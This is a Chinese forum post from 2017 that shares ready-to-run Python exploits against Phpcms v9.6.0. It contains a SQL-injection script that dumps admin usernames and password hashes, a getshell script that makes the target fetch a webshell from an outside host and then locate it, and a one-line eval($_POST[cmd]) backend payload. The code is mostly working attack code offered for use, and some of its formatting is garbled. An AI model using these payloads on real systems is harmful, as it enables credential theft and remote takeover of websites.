应天论坛

 找回密码
 参与我们

QQ登录

只需一步,快速开始

搜索
查看: 2041|回复: 0

phpcms漏洞

[复制链接]

276

主题

303

帖子

3197

积分

管理员

湘南小侠客

Rank: 9Rank: 9Rank: 9

积分
3197

优质服务勋章论坛元老

QQ
发表于 2017-5-21 23:05:16 | 显示全部楼层 |阅读模式
注入exp:

[mw_shl_code=python,true]import requests
import sys
import urllib

url = sys.argv[1]

print 'Phpcms v9.6.0 SQLi Exploit Code By Luan'

sqli_prefix = '%*27an*d%20'

sqli_info = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'

sqli_password1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '

sqli_password2 = '_admin li*mit 0,1)x))'

sqli_padding = '%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6'

setp1 = url + '/index.php?m=wap&a=index&siteid=1'

cookies = {}

for c in requests.get(setp1).cookies:

        if c.name[-7:] == '_siteid':

                cookie_head = c.name[:6]

                cookies[cookie_head+'_userid'] = c.value

        cookies[c.name] = c.value

print '[+] Get Cookie : ' + str(cookies)

setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_info, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding

for c in requests.get(setp2,cookies=cookies).cookies:

        if c.name[-9:] == '_att_json':

                sqli_payload = c.value

print '[+] Get SQLi Payload : ' + sqli_payload

setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload

html = requests.get(setp3,cookies=cookies).content

print '[+] Get SQLi Output : ' + html.split('luan$')[1]

table_prefix = html[html.find('_download_data')-2:html.find(        '_download_data')]

print '[+] Get Table Prefix : ' + table_prefix

setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_password1, safe='qwertyuiopasdfghjklzxcvbnm*') + table_prefix + urllib.quote_plus(sqli_password2, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding

for c in requests.get(setp2,cookies=cookies).cookies:

        if c.name[-9:] == '_att_json':

                sqli_payload = c.value

print '[+] Get SQLi Payload : ' + sqli_payload

setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload

html = requests.get(setp3,cookies=cookies).content

print '[+] Get SQLi Output : ' + html.split('luan$')[1][/mw_shl_code]

GETshell exp:

[mw_shl_code=python,true]# -*- coding:utf-8 -*-

'''
----------------------
Author : Akkuman
Blog   : hacktech.cn
----------------------
'''

import requests
import sys
from datetime import datetime


def getTime():
    year = str(datetime.now().year)
    month = "%02d" % datetime.now().month
    day = "%02d" % datetime.now().day
    hour = datetime.now().hour
    hour = hour - 12 if hour > 12 else hour
    hour = "%02d" % hour
    minute = "%02d" % datetime.now().minute
    second = "%02d" % datetime.now().second
    microsecond = "%06d" % datetime.now().microsecond
    microsecond = microsecond[:3]
    nowTime = year + month + day + hour + minute + second + microsecond
    return int(nowTime), year + "/" + month + day + "/"


def main():
    if len(sys.argv) < 2:
        print("
  • Usage   : Python 1.py http://xxx.com")
            sys.exit()
        host = sys.argv[1]
        url = host + "/index.php?m=member&c=index&a=register&siteid=1"

        data = {
            "siteid": "1",
            "modelid": "1",
            "username": "dsafaffdssdudi",
            "password": "123561",
            "email": "dsakkfdsjdi@qq.com",
            # 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
            "info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",
            "dosubmit": "1",
            "protocol": "",
        }
        try:
            startTime, _ = getTime()
            htmlContent = requests.post(url, data=data)
            finishTime, dateUrl = getTime()
            if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
                successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
                print("
  • Shell  : %s" % successUrl)
            else:
                print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
                successUrl = ""
                for t in range(startTime, finishTime):
                    checkUrlHtml = requests.get(
                        host + "/uploadfile/" + dateUrl + str(t) + ".php")
                    if checkUrlHtml.status_code == 200:
                        successUrl = host + "/uploadfile/" + \
                            dateUrl + str(t) + ".php"
                        print("
  • Shell  : %s" % successUrl)
                        break
                if successUrl == "":
                    print(
                        "[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")

        except:
            print("Request Error")


    if __name__ == '__main__':
        main()[/mw_shl_code]

    后台拿shell:
    [mw_shl_code=shell,true]index.php?m=content&c=content&a=public_sub_categorys&menuid=${@eval($_POST[cmd])}&f= [/mw_shl_code]
  • 每次见你穿短裤打领带,还穿个拖鞋,下次再这样穿不要从我家门口过了!
    http://gsh.yzqz.cn/CassettePlayer/index.html

    天之道,损有余而补不足.人之道则不然,损不足以奉有余.孰能有余以奉天下,唯有道者.
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 参与我们

    本版积分规则

    QQ|Archiver|手机版|小黑屋|应天社区 ( 湘ICP备17015224号 )

    GMT+8, 2024-12-22 13:17 , Processed in 0.078125 second(s), 30 queries .

    Powered by Discuz!

    © 2001-2017 Comsenz Inc.


    免责声明:
    本站所发布的第三方软件及资源(包括但不仅限于文字/图片/音频/视频等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢某程序或某个资源,请支持正版软件及版权方利益,注册或购买,得到更好的正版服务。如有侵权请邮件与我们联系处理。

    Mail To: admin@yzqz.cn

    快速回复 返回顶部 返回列表